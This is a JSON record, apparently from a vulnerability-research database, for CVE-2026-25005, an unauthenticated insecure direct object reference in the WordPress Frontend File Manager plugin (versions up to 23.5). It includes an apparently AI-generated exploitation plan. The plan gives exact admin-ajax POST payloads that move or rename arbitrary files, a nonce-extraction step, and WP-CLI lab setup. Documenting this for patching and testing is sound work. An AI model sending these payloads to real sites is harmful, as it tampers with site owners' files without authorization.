[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$faa03eBeL34DtdEk_lZnaQRrSCZ9kFeIXI3lSZKKs3WQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":35},"CVE-2026-25005","frontend-file-manager-plugin-unauthenticated-insecure-direct-object-reference","Frontend File Manager Plugin \u003C= 23.5 - Unauthenticated Insecure Direct Object Reference","The Frontend File Manager Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 23.5 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to perform an unauthorized action.","nmedia-user-file-uploader",null,"\u003C=23.5","23.6","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-01-16 00:00:00","2026-05-04 15:07:55",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F8a64d68b-8a0d-451b-ae2e-3cc583b4ed5a?source=api-prod",109,[22,23,24,25,26,27],"inc\u002Fadmin.php","inc\u002Farrays.php","inc\u002Fcallback-functions.php","inc\u002Ffiles.php","readme.txt","wp-file-manager.php","researched",false,3,"### 1. Vulnerability Summary\nThe **Frontend File Manager Plugin (\u003C= 23.5)** is vulnerable to an **Insecure Direct Object Reference (IDOR)**. The vulnerability exists because several AJAX callback functions registered for unauthenticated users (via the `wp_ajax_nopriv_` hook) do not perform sufficient authorization checks on the object being modified. \n\nSpecifically, the function `nm_uploadfile_move_file` (and potentially `wpfm_edit_file_title_desc`) fails to verify that the user requesting a change to a file (identified by a user-supplied `file_id`) has the permission to modify that specific file. In `nm_uploadfile_move_file`, if the \"Guest Upload\" setting is enabled, the code explicitly skips author validation, allowing any unauthenticated user to move any file (even private admin files) to any other directory.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action**: `nm_uploadfile_move_file`\n*   **Vulnerable Parameter**: `file_id` (The IDOR key) and `parent_id` (The target directory).\n*   **Authentication**: Unauthenticated (if guest uploads are enabled) or Low-Privileged.\n*   **Preconditions**: \n    1.  The plugin setting `wpfm_allow_guest_upload` must be set to `yes` (common in environments where the plugin is used for public submissions).\n    2.  The attacker needs the `post_id` of a target file.\n\n### 3. Code Flow\n1.  **Entry Point**: An unauthenticated user sends a POST request to `admin-ajax.php` with `action=nm_uploadfile_move_file`.\n2.  **Hook Registration**: In `inc\u002Farrays.php`, `wpfm_array_get_ajax_callbacks()` returns `\"nm_uploadfile_move_file\" => true`. This `true` value causes the plugin to register both `wp_ajax_nm_uploadfile_move_file` and `wp_ajax_nopriv_nm_uploadfile_move_file` (in `inc\u002Fhooks.php`).\n3.  **Vulnerable Function**: The execution hits `nm_uploadfile_move_file()` in `inc\u002Fcallback-functions.php`.\n4.  **Bypassed Check**: \n    ```php\n    $allow_guest = wpfm_get_option('_allow_guest_upload') == 'yes' ? true : false;\n    if( !$allow_guest && ! wpfm_is_current_user_post_author($_POST['file_id'] )) {\n        wp_send_json_error(__(\"Sorry, not allowed\", \"wpfm\"));\n    }\n    ```\n    If `_allow_guest_upload` is `yes`, the entire authorization block is bypassed.\n5.  **The Sink**: The function takes `$_REQUEST['file_id']` and `$_REQUEST['parent_id']` and calls `wp_update_post()`:\n    ```php\n    $result  = array(\n        'ID' => $file_id, \n        'post_parent' => $dir_id \n    );\n    $post_id = wp_update_post( $result, true );\n    ```\n    This updates the parent of any arbitrary WordPress post ID, provided the post type is compatible.\n\n### 4. Nonce Acquisition Strategy\nWhile the source code provided for 23.5 shows the nonce check is **commented out** in `nm_uploadfile_move_file`, it is best practice to provide a strategy in case it is enforced in a specific build.\n\n1.  **Identify Shortcode**: The plugin uses the shortcode `[ffmwp]`.\n2.  **Create Trigger Page**: Create a public page containing this shortcode to force the plugin to enqueue its scripts and localizes its variables.\n    ```bash\n    wp post create --post_type=page --post_title=\"File Manager\" --post_status=publish --post_content='[ffmwp]'\n    ```\n3.  **Extract Nonce**: Navigate to the new page and extract the nonce from the `wpfm_file_vars` or `wpfm_ajax_nonce` object.\n    *   **Variable**: `window.wpfm_file_vars` (inferred from common plugin patterns) or check for `wpfm_ajax_nonce` in the HTML.\n    *   **JS Command**: `browser_eval(\"window.wpfm_file_vars?.wpfm_ajax_nonce\")`\n\n### 5. Exploitation Strategy\nWe will demonstrate the IDOR by moving a \"Private Admin File\" into a different folder, effectively altering the file structure of the site.\n\n**Step 1: Discover File IDs**\nIdentify a file ID and a folder ID (post IDs for the `wpfm-files` post type).\n\n**Step 2: Send Exploitation Request**\nSend the following POST request via the `http_request` tool:\n\n*   **URL**: `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method**: `POST`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body**:\n    ```\n    action=nm_uploadfile_move_file&file_id=\u003CTARGET_FILE_ID>&parent_id=\u003CNEW_FOLDER_ID>&wpfm_ajax_nonce=\u003CNONCE>\n    ```\n\n### 6. Test Data Setup\nPerform the following via WP-CLI to prepare the environment:\n1.  **Enable Guest Upload**:\n    ```bash\n    # Setting the option directly in the settings array\n    wp option patch insert wpfm_settings wpfm_allow_guest_upload yes\n    ```\n2.  **Create a Folder (Parent)**:\n    ```bash\n    wp post create --post_type=wpfm-files --post_title=\"Target Folder\" --post_status=publish --post_author=1\n    ```\n3.  **Create a File (to be moved)**:\n    ```bash\n    wp post create --post_type=wpfm-files --post_title=\"Sensitive File\" --post_status=publish --post_author=1\n    ```\n4.  **Create a Public Page**:\n    ```bash\n    wp post create --post_type=page --post_title=\"Upload\" --post_status=publish --post_content='[ffmwp]'\n    ```\n\n### 7. Expected Results\n*   **Response**: The server should return a JSON success message:\n    `{\"success\":true,\"data\":{\"message\":\"File is move successfully\", ...}}`\n*   **Database Change**: The `post_parent` column of the `wpfm-files` post identified by `file_id` will be updated to the `parent_id`.\n\n### 8. Verification Steps\nAfter sending the HTTP request, verify the IDOR via WP-CLI:\n```bash\n# Check if the parent_id has changed for the sensitive file\nwp post get \u003CFILE_ID> --field=post_parent\n```\nIf the output matches `\u003CNEW_FOLDER_ID>`, the exploit is successful.\n\n### 9. Alternative Approaches\nIf `nm_uploadfile_move_file` is patched or behaves differently, target **`wpfm_edit_file_title_desc`**:\n*   **Action**: `wpfm_edit_file_title_desc`\n*   **Payload**: `action=wpfm_edit_file_title_desc&file_id=\u003CID>&file_title=HackedByIDOR&file_content=NewDescription`\n*   **Verification**: `wp post get \u003CID> --field=post_title`\n\nThe logic is identical: unauthenticated access via `nopriv` hook + missing validation of the `file_id` owner.","gemini-3-flash-preview","2026-05-05 08:01:38","2026-05-05 08:02:28",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","23.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnmedia-user-file-uploader\u002Ftags\u002F23.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnmedia-user-file-uploader.23.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnmedia-user-file-uploader\u002Ftags\u002F23.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnmedia-user-file-uploader.23.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnmedia-user-file-uploader\u002Ftags"]